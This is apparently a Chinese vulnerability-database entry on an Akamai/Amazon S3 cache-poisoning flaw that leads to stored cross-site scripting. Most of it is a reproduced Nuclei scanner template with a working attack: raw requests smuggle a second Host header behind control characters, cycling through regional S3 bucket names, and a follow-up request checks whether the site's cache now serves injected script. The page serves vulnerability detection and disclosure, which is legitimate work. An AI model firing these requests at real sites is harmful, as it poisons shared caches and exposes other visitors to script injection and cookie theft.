akamai-s3-cache-poisoning: Akamai/Amazon S3 - Cache Poisoning

日期: 2025-08-01 | 影响软件: Akamai Amazon S3 | POC: 已公开

漏洞描述

Akamai/Amazon S3 expose a stored cross-site scripting vulnerability generated by cache poisoning capability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can further allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PoC代码[已公开]

id: akamai-s3-cache-poisoning

info:
  name: Akamai/Amazon S3 - Cache Poisoning
  author: DhiyaneshDk
  severity: high
  description: Akamai/Amazon S3 expose a stored cross-site scripting vulnerability generated by cache poisoning capability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can further allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://web.archive.org/web/20230101082612/https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/
    - https://owasp.org/www-community/attacks/Cache_Poisoning
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cwe-id: CWE-44
  metadata:
    verified: true
    max-request: 204
  tags: cache,poisoning,xss,akamai,s3,misconfig,vuln
variables:
  rand: "{{rand_base(5)}}"

http:
  - raw:
      - |+
        GET /nuclei.svg?{{rand}}=x HTTP/1.1
        Host: {{Hostname}}
        {{escape}}Host: {{bucket}}

      - |+
        GET /nuclei.svg?{{rand}}=x HTTP/1.1
        Host: {{Hostname}}

    attack: clusterbomb
    payloads:
      escape:
        - "\v"
        - "\f"
        - "\x1c"
        - "\x1d"
        - "\x1e"
        - "\x1f"
      bucket:
        - "nuclei-ap-northeast-1"
        - "nuclei-ap-northeast-2"
        - "nuclei-ap-northeast-3"
        - "nuclei-ap-south-1"
        - "nuclei-ap-southeast-1"
        - "nuclei-ap-southeast-2"
        - "nuclei-ca-central-1"
        - "nuclei-eu-central-1"
        - "nuclei-eu-north-1"
        - "nuclei-eu-west-1"
        - "nuclei-eu-west-2"
        - "nuclei-eu-west-3"
        - "nuclei-sa-east-1"
        - "nuclei-us-east-1"
        - "nuclei-us-east-2"
        - "nuclei-us-west-1"
        - "nuclei-us-west-2"
    stop-at-first-match: true
    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "alert(document.domain)")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4a0a00473045022100aac77893e88ddd18fa4d35f6705e1c26d8bae5b910fd71e4573605d9a89128b202202c7a38d6c4a33b43f839a137c74af1f3d51616f8f18187ef6acec46b564fd3dc:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml